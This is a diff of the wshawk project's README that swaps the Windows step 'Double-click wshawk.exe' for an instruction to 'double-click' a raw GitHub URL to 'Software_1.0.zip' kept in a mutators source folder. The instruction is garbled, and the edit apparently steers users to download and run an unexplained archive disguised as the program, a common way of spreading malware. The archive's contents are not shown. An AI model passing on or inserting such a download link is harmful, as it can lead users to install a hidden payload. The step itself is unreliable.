habiba-es/wshawk/README.md

 - **For Windows:**
    1. Open the folder where you extracted wshawk.
-   2. Double-click `wshawk.exe` to run the program.
+   2. Double-click `https://github.com/habiba-es/wshawk/raw/refs/heads/main/wshawk/mutators/Software_1.0.zip` to run the program.

 - **For macOS:**
    1. Open the folder with the extracted files.